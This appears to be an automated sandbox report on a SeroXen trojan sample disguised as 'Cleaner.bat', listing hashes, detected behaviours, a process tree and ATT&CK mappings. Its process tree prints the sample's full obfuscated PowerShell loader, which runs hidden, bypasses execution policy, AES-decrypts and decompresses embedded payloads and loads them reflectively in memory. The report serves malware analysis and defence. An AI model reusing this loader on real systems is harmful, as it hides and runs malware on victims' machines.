seroxen | f6d5e88fd7b0c59e3b98adaa661590c94945883d5bfba56d11746605141da395

General

Target

Cleaner.bat
Size

15.5MB
MD5

48801e3774deebf8666d6df1b37757e3
SHA1

1a68988bdad3a3bf789a20075ed05a59f3813e5b
SHA256

f6d5e88fd7b0c59e3b98adaa661590c94945883d5bfba56d11746605141da395
SHA512

e4b37d2a211b945da7dc4cd3d88e6240bde3114507c74aecaccef02e636b96f3866e660b5b11313930cd1e931e8f517d003a50961bf7adf91af1c25be56da938
SSDEEP

49152:Kx/LBdXSxlnIlRqh3wA19LrN1d2UlYQ7QR3CU5Vwt+Ik/3kwfDgevpMajDX26/dM:n

Score

10^/10

seroxen trojan

Malware Config

Signatures

Seroxen family
seroxen
Seroxen, Ser0xen
Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.
trojan seroxen

Executes dropped EXE 1 IoCs

pid	Process
2740	Cleaner.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
2104	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2740	Cleaner.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2740	Cleaner.bat.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2360	2104	cmd.exe	31
PID 2104 wrote to memory of 2360	2104	cmd.exe	31
PID 2104 wrote to memory of 2360	2104	cmd.exe	31
PID 2360 wrote to memory of 2524	2360	net.exe	32
PID 2360 wrote to memory of 2524	2360	net.exe	32
PID 2360 wrote to memory of 2524	2360	net.exe	32
PID 2104 wrote to memory of 2740	2104	cmd.exe	34
PID 2104 wrote to memory of 2740	2104	cmd.exe	34
PID 2104 wrote to memory of 2740	2104	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2524
- C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
  "Cleaner.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function qWlBA($GQnkT){ $zUdNH=[System.Security.Cryptography.Aes]::Create(); $zUdNH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zUdNH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zUdNH.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0OWCsNt6PmKvzu+DQWbthNDySoZqQ4Bm08IUJOv17X8='); $zUdNH.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('58danPBznfDATHzUq5e//A=='); $wJpVC=$zUdNH.CreateDecryptor(); $return_var=$wJpVC.TransformFinalBlock($GQnkT, 0, $GQnkT.Length); $wJpVC.Dispose(); $zUdNH.Dispose(); $return_var;}function QNqpu($GQnkT){ $FHhWi=New-Object System.IO.MemoryStream(,$GQnkT); $qfUNJ=New-Object System.IO.MemoryStream; $SJhNx=New-Object System.IO.Compression.GZipStream($FHhWi, [IO.Compression.CompressionMode]::Decompress); $SJhNx.CopyTo($qfUNJ); $SJhNx.Dispose(); $FHhWi.Dispose(); $qfUNJ.Dispose(); $qfUNJ.ToArray();}function yKwby($GQnkT,$PimDA){ $nXZSU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$GQnkT); $elFUx=$nXZSU.EntryPoint; $elFUx.Invoke($null, $PimDA);}$BUaSq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);foreach ($oRlIQ in $BUaSq) { if ($oRlIQ.StartsWith(':: ')) { $yxigf=$oRlIQ.Substring(4); break; }}$tcmyC=[string[]]$yxigf.Split('\');$ARJTU=QNqpu (qWlBA ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tcmyC[0])));$KwDnR=QNqpu (qWlBA ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tcmyC[1])));yKwby $KwDnR (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));yKwby $ARJTU (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2740-7-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

Filesize
4KB

Download
memory/2740-8-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2740-9-0x0000000000470000-0x0000000000478000-memory.dmp

Filesize
32KB

Download
memory/2740-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-12-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-13-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing